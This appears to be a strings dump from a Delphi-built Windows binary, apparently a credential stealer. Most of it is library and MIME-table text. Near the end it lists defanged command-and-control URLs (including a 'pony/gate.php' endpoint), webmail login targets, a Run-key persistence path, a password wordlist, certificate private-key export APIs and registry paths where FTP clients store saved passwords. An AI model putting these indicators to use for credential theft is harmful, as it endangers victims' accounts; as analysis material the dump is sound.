IWebBrowser2

TWebBrowserStatusTextChange

TWebBrowserProgressChange

TWebBrowserCommandStateChange

TWebBrowserTitleChange

TWebBrowserPropertyChange

TWebBrowserBeforeNavigate2

TWebBrowserNewWindow2

TWebBrowserNavigateComplete2

TWebBrowserDocumentComplete

TWebBrowserOnVisible

TWebBrowserOnToolBar

TWebBrowserOnMenuBar

TWebBrowserOnStatusBar

TWebBrowserOnFullScreen

TWebBrowserOnTheaterMode

TWebBrowserWindowSetResizable

TWebBrowserWindowSetLeft

TWebBrowserWindowSetTop

TWebBrowserWindowSetWidth

TWebBrowserWindowSetHeight

TWebBrowserWindowClosing

TWebBrowserClientToHostWindow

TWebBrowserSetSecureLockIcon

TWebBrowserFileDownload

TWebBrowserNavigateError

%TWebBrowserPrintTemplateInstantiation

TWebBrowserPrintTemplateTeardown

TWebBrowserUpdatePageStatus

%TWebBrowserPrivacyImpactedStateChange

FOnWindowSetResizable

FOnWindowSetLeft

FOnWindowSetTop

FOnWindowSetWidth

FOnWindowSetHeight

TWebBrowser&

cmdID

cmdexecopt

TWebBrowser

OnWindowSetResizable

OnWindowSetLeft$0T

OnWindowSetTop

OnWindowSetWidth

OnWindowSetHeight

LocationURL

UhCrT

EInvalidGridOperation

goAlwaysShowEditor

Generics.Defaults

Generics.Collections

UrlMon

IdTCPServer

IdCustomTCPServer

#!V!W!"!&!r%!%#%%%'%)%c%e%g%C%

P%S%V%Y%\%

?456789:;

!"#$%&'()* ,-./0123

oleaut32.dll

advapi32.dll

RegOpenKeyExW

RegCloseKey

user32.dll

kernel32.dll

UnhookWindowsHookEx

SetWindowsHookExW

SetKeyboardState

MsgWaitForMultipleObjectsEx

MsgWaitForMultipleObjects

MapVirtualKeyW

LoadKeyboardLayoutW

GetKeyboardState

GetKeyboardLayoutNameW

GetKeyboardLayoutList

GetKeyboardLayout

GetKeyState

GetKeyNameTextW

EnumWindows

EnumThreadWindows

EnumChildWindows

ActivateKeyboardLayout

msimg32.dll

gdi32.dll

SetViewportOrgEx

SetViewportExtEx

version.dll

GetCPInfoExW

GetCPInfo

RegUnLoadKeyW

RegSaveKeyW

RegRestoreKeyW

RegReplaceKeyW

RegQueryInfoKeyW

RegLoadKeyW

RegFlushKey

RegEnumKeyExW

RegDeleteKeyW

RegCreateKeyExW

ole32.dll

comctl32.dll

winspool.drv

URLMON.DLL

URLDownloadToFileW

shell32.dll

windowscodecs.dll

uxtheme.dll

DWMAPI.DLL

1$1$0,0004080

>#>'> >/>3>

7#7'7 7/73777

0D1r1D3H3L3P3T3X3\3`3d3h3l3p3t3%4U4>6

7v7D7}7

0-0K0Y0g0}0

=(=,=

>~> ?@?[?

7v7D7

8"8&8*8.828

?$?[?_?}?

3

: :$:(:,:0:4:8:<:>0 0$0(0,0004080`0
6 6(60686@6
4D4F4[4i4y4
8Æ’8D8[8i8y8
3?3l3
: :?:[:{:
-060Q0g0}0
=^=
090=0\0`0
9!9Å“9G9K9h9l9p9
10141[1_1
25292\2`2
3 3?3^3~3
KWindows
CGenerics.Defaults
0IdHTTPHeaderInfo
 IdTCPServer
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
Picture.Data
%u,vb
v w.RXd
56Ba %CRbq
-7b1%u$
^%f D
t%Ud8uY
r%1U(
$u%F)`
$xP%f
.Ki[%
.qms$
5.RVXL
y".AG}
#%CQt
NA
>#w*.yb
%D]tcbJ]
Lines.Strings
ProxyParams.BasicAuthentication
ProxyParams.ProxyPort
Request.ContentLength
Request.ContentRangeEnd
Request.ContentRangeStart
"Request.ContentRangeInstanceLength
Request.Accept
Request.BasicAuthentication
Request.UserAgent
&Mozilla/3.0 (compatible; Indy Library)
Request.Ranges.Units
Request.Ranges
HTTPOptions
S5%DO
#A%d"
Ã»Tq
z3I%.vr\
,,6%dri
%DScp
version="15.0.3890.34076"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
C:\Builds\TP\rtl\sys\SysUtils.pas
%s-%s
C:\Builds\TP\rtl\common\TypInfo.pas
%s[%d]
%s_%d
.Owner
C:\Builds\TP\rtl\common\Classes.pas
C:\Builds\TP\rtl\common\SyncObjs.pas
\\?\UNC\
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
%s (*.%s)|*.%1:s
%s (%s)|%1:s|
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
crSQLWait
%s (%s)
imm32.dll
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
clWebSnow
clWebFloralWhite
clWebLavenderBlush
clWebOldLace
clWebIvory
clWebCornSilk
clWebBeige
clWebAntiqueWhite
clWebWheat
clWebAliceBlue
clWebGhostWhite
clWebLavender
clWebSeashell
clWebLightYellow
clWebPapayaWhip
clWebNavajoWhite
clWebMoccasin
clWebBurlywood
clWebAzure
clWebMintcream
clWebHoneydew
clWebLinen
clWebLemonChiffon
clWebBlanchedAlmond
clWebBisque
clWebPeachPuff
clWebTan
clWebYellow
clWebDarkOrange
clWebRed
clWebDarkRed
clWebMaroon
clWebIndianRed
clWebSalmon
clWebCoral
clWebGold
clWebTomato
clWebCrimson
clWebBrown
clWebChocolate
clWebSandyBrown
clWebLightSalmon
clWebLightCoral
clWebOrange
clWebOrangeRed
clWebFirebrick
clWebSaddleBrown
clWebSienna
clWebPeru
clWebDarkSalmon
clWebRosyBrown
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebOlive
clWebForestGreen
clWebGreenYellow
clWebChartreuse
clWebLightGreen
clWebAquamarine
clWebSeaGreen
clWebGoldenRod
clWebKhaki
clWebOliveDrab
clWebGreen
clWebYellowGreen
clWebLawnGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkgreen
clWebLimeGreen
clWebLime
clWebSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebLightCyan
clWebLightBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebIndigo
clWebMediumTurquoise
clWebTurquoise
clWebCyan
clWebPowderBlue
clWebSkyBlue
clWebRoyalBlue
clWebMediumBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebCadetBlue
clWebDarkCyan
clWebTeal
clWebDeepskyBlue
clWebDodgerBlue
clWebBlue
clWebNavy
clWebDarkViolet
clWebDarkOrchid
clWebMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebMediumOrchid
clWebMediumPurple
clWebPurple
clWebDeepPink
clWebLightPink
clWebViolet
clWebOrchid
clWebPlum
clWebThistle
clWebHotPink
clWebPink
clWebLightSteelBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebWhite
clWebLightgrey
clWebGray
clWebSteelBlue
clWebSlateBlue
clWebSlateGray
clWebWhiteSmoke
clWebSilver
clWebDimGray
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlategray
clWebGainsboro
clWebDarkGray
clWebBlack
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
C:\Builds\TP\indysockets\lib\system\IdStreamVCL.pas
C:\Builds\TP\indysockets\lib\system\IdGlobal.pas
%s, %.2d %s %.4d %s %s
%s, %.2d-%s-%.2d %s %s
WS2_32.DLL
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
MSWSOCK.DLL
WSARecvMsg
WSASendMsg
Wship6.dll
Fwpuclnt.dll
127.0.0.1
C:\Builds\TP\indysockets\lib\system\IdStack.pas
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.irv:1983
csISO16Portuguese
csISO84Portuguese2
csShiftJIS
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csMicrosoftPublishing
Windows-31J
csWindows31J
PTCP154
csPTCP154
10.5.7
.nml=animation/narrative
.aac=audio/mp4
.aif=audio/x-aiff
.aifc=audio/x-aiff
.aiff=audio/x-aiff
.au=audio/basic
.gsm=audio/x-gsm
.kar=audio/midi
.m3u=audio/mpegurl
.mid=audio/midi
.midi=audio/midi
.mpega=audio/x-mpg
.mp2=audio/x-mpg
.mp3=audio/x-mpg
.mpga=audio/x-mpg
.m3u=audio/x-mpegurl
.pls=audio/x-scpls
.qcp=audio/vnd.qcelp
.ra=audio/x-realaudio
.ram=audio/x-pn-realaudio
.rm=audio/x-pn-realaudio
.sd2=audio/x-sd2
.sid=audio/prs.sid
.snd=audio/basic
.wav=audio/x-wav
.wax=audio/x-ms-wax
.wma=audio/x-ms-wma
.mjf=audio/x-vnd.AudioExplosion.MjuiceMediaFile
.art=image/x-jg
.bmp=image/bmp
.cdr=image/x-coreldraw
.cdt=image/x-coreldrawtemplate
.cpt=image/x-corelphotopaint
.djv=image/vnd.djvu
.djvu=image/vnd.djvu
.gif=image/gif
.ief=image/ief
.ico=image/x-icon
.jng=image/x-jng
.jpg=image/jpeg
.jpeg=image/jpeg
.jpe=image/jpeg
.pat=image/x-coreldrawpattern
.pcx=image/pcx
.pbm=image/x-portable-bitmap
.pgm=image/x-portable-graymap
.pict=image/x-pict
.png=image/x-png
.pnm=image/x-portable-anymap
.pntg=image/x-macpaint
.ppm=image/x-portable-pixmap
.psd=image/x-psd
.qtif=image/x-quicktime
.ras=image/x-cmu-raster
.rf=image/vnd.rn-realflash
.rgb=image/x-rgb
.rp=image/vnd.rn-realpix
.sgi=image/x-sgi
.svg=image/svg-xml
.svgz=image/svg-xml
.targa=image/x-targa
.tif=image/x-tiff
.wbmp=image/vnd.wap.wbmp
.xbm=image/xbm
.xbm=image/x-xbitmap
.xpm=image/x-xpixmap
.xwd=image/x-xwindowdump
.xml=text/xml
.uls=text/iuls
.txt=text/plain
.rtx=text/richtext
.wsc=text/scriptlet
.rt=text/vnd.rn-realtext
.htt=text/webviewhtml
.htc=text/x-component
.vcf=text/x-vcard
.asf=video/x-ms-asf
.asx=video/x-ms-asf
.avi=video/x-msvideo
.dl=video/dl
.dv=video/dv
.flc=video/flc
.fli=video/fli
.gl=video/gl
.lsf=video/x-la-asf
.lsx=video/x-la-asf
.mng=video/x-mng
.mp2=video/mpeg
.mp3=video/mpeg
.mp4=video/mpeg
.mpeg=video/x-mpeg2a
.mpa=video/mpeg
.mpe=video/mpeg
.mpg=video/mpeg
.moov=video/quicktime
.mov=video/quicktime
.mxu=video/vnd.mpegurl
.qt=video/quicktime
.qtc=video/x-qtc
.rv=video/vnd.rn-realvideo
.ivf=video/x-ivf
.wm=video/x-ms-wm
.wmp=video/x-ms-wmp
.wmv=video/x-ms-wmv
.wmx=video/x-ms-wmx
.wvx=video/x-ms-wvx
.rms=video/vnd.rn-realvideo-secure
.asx=video/x-ms-asf-plugin
.movie=video/x-sgi-movie
.aab=application/x-authorware-bin
.aam=application/x-authorware-map
.aas=application/x-authorware-seg
.abw=application/x-abiword
.ace=application/x-ace-compressed
.ai=application/postscript
.alz=application/x-alz-compressed
.ani=application/x-navi-animation
.arj=application/x-arj
.asf=application/vnd.ms-asf
.bat=application/x-msdos-program
.bcpio=application/x-bcpio
.boz=application/x-bzip2
.bz=application/x-bzip
.bz2=application/x-bzip2
.cab=application/vnd.ms-cab-compressed
.cat=application/vnd.ms-pki.seccat
.ccn=application/x-cnc
.cco=application/x-cocoa
.cdf=application/x-cdf
.cer=application/x-x509-ca-cert
.chm=application/vnd.ms-htmlhelp
.chrt=application/vnd.kde.kchart
.cil=application/vnd.ms-artgalry
.class=application/java-vm
.com=application/x-msdos-program
.clp=application/x-msclip
.cpio=application/x-cpio
.cpt=application/mac-compactpro
.cqk=application/x-calquick
.crd=application/x-mscardfile
.crl=application/pkix-crl
.csh=application/x-csh
.dar=application/x-dar
.dbf=application/x-dbase
.dcr=application/x-director
.deb=application/x-debian-package
.dir=application/x-director
.dist=vnd.apple.installer xml
.distz=vnd.apple.installer xml
.dll=application/x-msdos-program
.dmg=application/x-apple-diskimage
.doc=application/msword
.dot=application/msword
.dvi=application/x-dvi
.dxr=application/x-director
.ebk=application/x-expandedbook
.eps=application/postscript
.evy=application/envoy
.exe=application/x-msdos-program
.fdf=application/vnd.fdf
.fif=application/fractals
.flm=application/vnd.kde.kivio
.fml=application/x-file-mirror-list
.gzip=application/x-gzip
.gnumeric=application/x-gnumeric
.gtar=application/x-gtar
.gz=application/x-gzip
.hdf=application/x-hdf
.hlp=application/winhlp
.hpf=application/x-icq-hpf
.hqx=application/mac-binhex40
.hta=application/hta
.ims=application/vnd.ms-ims
.ins=application/x-internet-signup
.iii=application/x-iphone
.iso=application/x-iso9660-image
.jar=application/java-archive
.karbon=application/vnd.kde.karbon
.kfo=application/vnd.kde.kformula
.kon=application/vnd.kde.kontour
.kpr=application/vnd.kde.kpresenter
.kpt=application/vnd.kde.kpresenter
.kwd=application/vnd.kde.kword
.kwt=application/vnd.kde.kword
.latex=application/x-latex
.lha=application/x-lzh
.lcc=application/fastman
.lrm=application/vnd.ms-lrm
.lz=application/x-lzip
.lzh=application/x-lzh
.lzma=application/x-lzma
.lzo=application/x-lzop
.lzx=application/x-lzx
.mpp=application/vnd.ms-project
.mvb=application/x-msmediaview
.man=application/x-troff-man
.mdb=application/x-msaccess
.me=application/x-troff-me
.ms=application/x-troff-ms
.msi=application/x-msi
.mpkg=vnd.apple.installer xml
.mny=application/x-msmoney
.nix=application/x-mix-transfer
.oda=application/oda
.odb=application/vnd.oasis.opendocument.database
.odc=application/vnd.oasis.opendocument.chart
.odf=application/vnd.oasis.opendocument.formula
.odg=application/vnd.oasis.opendocument.graphics
.odi=application/vnd.oasis.opendocument.image
.odm=application/vnd.oasis.opendocument.text-master
.odp=application/vnd.oasis.opendocument.presentation
.ods=application/vnd.oasis.opendocument.spreadsheet
.ogg=application/ogg
.odt=application/vnd.oasis.opendocument.text
.otg=application/vnd.oasis.opendocument.graphics-template
.oth=application/vnd.oasis.opendocument.text-web
.otp=application/vnd.oasis.opendocument.presentation-template
.ots=application/vnd.oasis.opendocument.spreadsheet-template
.ott=application/vnd.oasis.opendocument.text-template
.p7b=application/x-pkcs7-certificates
.p7r=application/x-pkcs7-certreqresp
.package=application/vnd.autopackage
.pfr=application/font-tdpfr
.pkg=vnd.apple.installer xml
.pdf=application/pdf
.pko=application/vnd.ms-pki.pko
.pl=application/x-perl
.pnq=application/x-icq-pnq
.pot=application/mspowerpoint
.pps=application/mspowerpoint
.ppt=application/mspowerpoint
.ppz=application/mspowerpoint
.ps=application/postscript
.pub=application/x-mspublisher
.qpw=application/x-quattropro
.qtl=application/x-quicktimeplayer
.rar=application/rar
.rdf=application/rdf xml
.rjs=application/vnd.rn-realsystem-rjs
.rm=application/vnd.rn-realmedia
.rmf=application/vnd.rmf
.rmp=application/vnd.rn-rn_music_package
.rmx=application/vnd.rn-realsystem-rmx
.rnx=application/vnd.rn-realplayer
.rpm=application/x-redhat-package-manager
.rsml=application/vnd.rn-rsml
.rtsp=application/x-rtsp
.rss=application/rss xml
.scm=application/x-icq-scm
.ser=application/java-serialized-object
.scd=application/x-msschedule
.sda=application/vnd.stardivision.draw
.sdc=application/vnd.stardivision.calc
.sdd=application/vnd.stardivision.impress
.sdp=application/x-sdp
.setpay=application/set-payment-initiation
.setreg=application/set-registration-initiation
.sh=application/x-sh
.shar=application/x-shar
.shw=application/presentations
.sit=application/x-stuffit
.sitx=application/x-stuffitx
.skd=application/x-koan
.skm=application/x-koan
.skp=application/x-koan
.skt=application/x-koan
.smf=application/vnd.stardivision.math
.smi=application/smil
.smil=application/smil
.spl=application/futuresplash
.ssm=application/streamingmedia
.sst=application/vnd.ms-pki.certstore
.stc=application/vnd.sun.xml.calc.template
.std=application/vnd.sun.xml.draw.template
.sti=application/vnd.sun.xml.impress.template
.stl=application/vnd.ms-pki.stl
.stw=application/vnd.sun.xml.writer.template
.svi=application/softvision
.sv4cpio=application/x-sv4cpio
.sv4crc=application/x-sv4crc
.swf=application/x-shockwave-flash
.swf1=application/x-shockwave-flash
.sxc=application/vnd.sun.xml.calc
.sxi=application/vnd.sun.xml.impress
.sxm=application/vnd.sun.xml.math
.sxw=application/vnd.sun.xml.writer
.sxg=application/vnd.sun.xml.writer.global
.tar=application/x-tar
.tcl=application/x-tcl
.tex=application/x-tex
.texi=application/x-texinfo
.texinfo=application/x-texinfo
.tbz=application/x-bzip-compressed-tar
.tbz2=application/x-bzip-compressed-tar
.tgz=application/x-compressed-tar
.tlz=application/x-lzma-compressed-tar
.tr=application/x-troff
.trm=application/x-msterminal
.troff=application/x-troff
.tsp=application/dsptype
.torrent=application/x-bittorrent
.ttz=application/t-time
.txz=application/x-xz-compressed-tar
.udeb=application/x-debian-package
.uin=application/x-icq
.urls=application/x-url-list
.ustar=application/x-ustar
.vcd=application/x-cdlink
.vor=application/vnd.stardivision.writer
.vsl=application/x-cnet-vsl
.wcm=application/vnd.ms-works
.wb1=application/x-quattropro
.wb2=application/x-quattropro
.wb3=application/x-quattropro
.wdb=application/vnd.ms-works
.wks=application/vnd.ms-works
.wmd=application/x-ms-wmd
.wms=application/x-ms-wms
.wmz=application/x-ms-wmz
.wp5=application/wordperfect5.1
.wpd=application/wordperfect
.wpl=application/vnd.ms-wpl
.wps=application/vnd.ms-works
.wri=application/x-mswrite
.xfdf=application/vnd.adobe.xfdf
.xls=application/x-msexcel
.xlb=application/x-msexcel
.xpi=application/x-xpinstall
.xps=application/vnd.ms-xpsdocument
.xsd=application/vnd.sun.xml.draw
.xul=application/vnd.mozilla.xul xml
.zoo=application/x-zoo
.zip=application/x-zip-compressed
.wml=text/vnd.wap.wml
.wmlc=application/vnd.wap.wmlc
.wmls=text/vnd.wap.wmlscript
.wmlsc=application/vnd.wap.wmlscriptc
.asm=text/x-asm
.pas=text/x-pascal
.cs=text/x-csharp
.cpp=text/x-c  src
.cxx=text/x-c  src
.cc=text/x-c  src
.hpp=text/x-c  hdr
.hxx=text/x-c  hdr
.hh=text/x-c  hdr
.java=text/x-java
.css=text/css
.js=text/javascript
.htm=text/html
.html=text/html
.ls=text/javascript
.mocha=text/javascript
.shtml=server-parsed-html
.sgm=text/sgml
.sgml=text/sgml
C:\Builds\TP\indysockets\lib\protocols\IdGlobalProtocols.pas
HTTP-EQUIV
()@,;:\"./
()@,;:\"/[]?=
()@,;:\"/[]?={}
TIdEncoder3to4.Encode: Calculated length exceeded (expected
C:\Builds\TP\indysockets\lib\protocols\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
X-HTTP-Method-Override
Mozilla/3.0 (compatible; Indy Library)
%d-%d
C:\Builds\TP\indysockets\lib\core\IdIOHandler.pas
255.255.255.255
0.0.0.0
C:\Builds\TP\indysockets\lib\core\IdIOHandlerStack.pas
0.0.0.1
C:\Builds\TP\indysockets\lib\core\IdThread.pas
C:\Builds\TP\indysockets\lib\core\IdScheduler.pas
C:\Builds\TP\indysockets\lib\protocols\IdZLibCompressorBase.pas
*#%"{}|\^[]`
*#%"{}|\^[]` 
HTTPS
.local
HttpOnly
C:\Builds\TP\indysockets\lib\protocols\IdCookie.pas
HTTPONLY
$Port
COMMENTURL
PORT
WINDOWS
C:\Builds\TP\indysockets\lib\protocols\IdHeaderCoderIndy.pas
()[]:;.,@\"
Content-Disposition: form-data; name="%s"
; filename="%s"
Content-Type: %s
; charset="%s"
Content-Transfer-Encoding: %s
libeay32.dll
ssleay32.dll
libssl32.dll
C:\Builds\TP\indysockets\lib\protocols\IdSSLOpenSSLHeaders.pas
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_add_cert
X509_STORE_CTX_get_current_cert
i2d_DSAPrivateKey
d2i_DSAPrivateKey
d2i_PrivateKey
d2i_PrivateKey_bio
DES_set_key
_ossl_old_des_set_key
RSA_generate_key
RSA_check_key
RSA_generate_key_ex
i2d_PrivateKey_bio
i2d_RSAPrivateKey
d2i_RSAPrivateKey
i2d_RSAPublicKey
d2i_RSAPublicKey
i2d_PrivateKey
i2d_NETSCAPE_CERT_SEQUENCE
X509_get_default_cert_file
X509_get_default_cert_file_env
X509_set_pubkey
X509_REQ_set_pubkey
PEM_read_bio_RSAPrivateKey
PEM_read_bio_RSAPublicKey
PEM_read_bio_DSAPrivateKey
PEM_read_bio_PrivateKey
PEM_read_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_RSAPublicKey
PEM_write_bio_DSAPrivateKey
PEM_write_bio_PrivateKey
PEM_write_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_PKCS8PrivateKey
EVP_PKEY_type
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_assign
C:\Builds\TP\indysockets\lib\protocols\IdSSLOpenSSL.pas
secur32.dll
security.dll
C:\Builds\TP\indysockets\lib\protocols\IdHTTP.pas
application/x-www-form-urlencoded
https
HTTP/1.0 200 OK
HTTP/
%s, ClassID: %s
olepro32.dll
%d - %s
C:\Builds\TP\vcl\OleServer.pas
login
passwd
ggg.txt
hXXps://people.live.com
hXXps://people.live.com/export?canary=
hXXp://91.108.68.202/up.php
hXXps://mail.google.com/mail/u/0/h/1ueaawj88elpf/?&v=cl&pnl=a
Passwd
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
firefox
firefox.exe
iexplore.exe
chrome
chrome.exe
VVV.hotmail.com
hXXp://VVV.gmail.com
hXXps://login.globo.com/login/1948
hXXps://login.globo.com/login/1
Kernel32.dll
Open SSL Support DLL Delphi and C  Builder interface
hXXp://VVV.indyproject.org/
1993 - 2009
JPEG error #%d
Unsupported operation./Could not encode header data using charset "%s"
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
DCOM not installed"'%s' is not a valid property value
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s&Cannot change the size of a JPEG image
SSL status: "%s"
%s Alert
%s Read Alert
%s Write Alert
Handshake DonepUnsupported object type. You can assign only one of the following types or their descendants: TStrings, TStream.
Unknown credentials use!Do AcquireCredentialsHandle first"CompleteAuthToken is not supported$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Mode has not been set.:There is no LSA mode context associated with this context.8The clocks on the client and server machines are skewed.;The certificate chain was issued by an untrusted authority.7The message received was unexpected or badly formatted.;An unknown error occurred while processing the certificate.%The received certificate has expired.*The specified data could not be encrypted.*The specified data could not be decrypted.YThe client and server cannot communicate, because they do not possess a common algorithm.
Unknown error#SSPI %s returns error #%d(0x%x): %s0SSPI interface has failed to initialise properly
No credential handle acquiredBCan not change credentials after handle aquired. Use Release first4No credentials are available in the security packageCThe message or signature supplied for verification has been altered8The message supplied for verification is out of sequence3No authority could be contacted for authentication.UThe function completed successfully, but must be called again to complete the contextEThe function completed successfully, but CompleteToken must be calledtThe function completed successfully, but both CompleteToken and this function must be called to complete the contextsThe logon was completed, but no network authority was available. The logon was made using locally known information-The requested security package does not exist2The context has expired and can no longer be used.DThe supplied message is incomplete. The signature was not verified.lThe credentials supplied were not complete, and could not be verified. The context could not be initialized.1The buffers supplied to a function was too small.
KUnsupported hash algorithm. This implementation supports only MD5 encoding.
The handle specified is invalid'The function requested is not supported.The specified target is unknown or unreachable0The Local Security Authority cannot be contacted-The requested security package does not exist6The caller is not the owner of the desired credentialsBThe security package failed to initialize, and cannot be installed-The token supplied to the function is invalid^The security package is not able to marshall the logon buffer, so the logon attempt has failedNThe per-message Quality of Protection is not supported by the security package?The security context does not allow impersonation of the client
The logon attempt failed;The credentials supplied to the package were not recognized UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.$Cannot change a connected IOHandler.%No IOHandler of type %s is installed.
Reply Code is not valid: %s
Reply Code already exists: %s
IOHandler value is not valid'Algorithm %s not permitted in FIPS mode
Unknown Protocol(Request method requires HTTP version 1.1
File "%s" not found
Object type not supported.
Transparent proxy cannot bind.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Address type not supported."%d: Circular links are not allowed"Not enough data in buffer. (%d/%d)1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Invalid Port Range (%d - %d)
%s is not a valid service.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
End of stream: Class %s at %d)UDP is not support in this SOCKS version.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Resolving hostname %s.
Connecting to %s.
Socket Error # %d
Operation would block.
Operation now in progress.
Operation already in progress.
Invalid clipboard format Clipboard does not support Icons
Cannot open clipboard: %s
Text exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form
- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
Grid too large for operation Too many rows or columns deleted
Invalid input value7Invalid input value. Use escape key to abandon changes
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parent
Invalid operation on TOleGraphic$Unknown picture file extension (.%s)
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
No help found for context %d
No help found for %s
Scan line index out of range!Cannot change the size of an iconÃŠnnot change the size of a WIC Image
Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created thread9Cannot call SetReturnValue on an externally create thread'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d The specified file was not found$No help viewer that supports filters7String index out of range (%d). Must be >= 1 and Invalid Timeout value: %s#''%s'' is not a valid integer value
List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM class
Error reading %s%s%s: %s
Failed to create key %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid file name - %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
Invalid destination array"Character index out of bounds (%d)
Start index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
External exception %x
Interface not supported
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
'%d.%d' is not a valid timestamp
I/O error %d
Integer overflow Invalid floating point operation
p.exe_1536:.text
`.data
password
12345678
password1
monkey
1234567
123456789
7777777
asshole
mickey
passw0rd
smokey
hockey
11111111
windows
1234567890
hXXp://bigbone10.info/pony/gate.php
hXXp://bigbone10.info:8080/pony/gate.php
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
kernel32.dll
netapi32.dll
ole32.dll
advapi32.dll
CryptGetUserKey
CryptExportKey
CryptDestroyKey
crypt32.dll
CertOpenSystemStoreA
CertEnumCertificatesInStore
CertCloseStore
CryptAcquireCertificatePrivateKey
msi.dll
pstorec.dll
^shell32.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
explorer.exe
POST %s HTTP/1.0
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
{X-X-X-XX-XXXXXX}
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
Password
wcx_PTF.ini
FtpIniName
Software\Ghisler\Windows Commander
\Ipswitch\WS_FTP
\win.ini
WS_FTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
